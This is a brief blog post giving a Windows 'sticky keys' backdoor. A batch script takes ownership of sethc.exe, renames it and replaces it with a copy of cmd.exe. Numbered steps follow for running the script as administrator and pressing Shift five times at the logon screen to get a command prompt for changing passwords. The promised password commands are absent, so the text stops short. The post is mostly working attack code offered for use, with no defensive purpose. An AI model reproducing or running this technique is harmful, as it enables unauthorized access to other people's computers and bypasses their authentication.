Pages

windows backdoor

Friday 17 January 2014
sticky keys and utility manager are the backdoors of windows operating system
goto:c:\windows\system32\sethc.exe



code:

@echo off
pause
takeown /f %systemroot%\system32\sethc.exe
icacls %systemroot%\system32\sethc.exe /grant administrators:f
rename %systemroot%\system32\sethc.exe  sethc.exe.bak
copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe
rename %systemroot%\system32\cmd3.exe sethc.exe
pause
echo Now press the Shift key 5 times at Logon Screen.
pause


1.copy the code into notepad & save the file as file name.bat
2.run the file name.bat as run as administrator on right clicking the file

after the execution of file sethc.exe appears as follows:


press shift key for 5 times which opens the cmd prompt at logon screen
use following commands to change the password at logon screen




No comments:

Post a Comment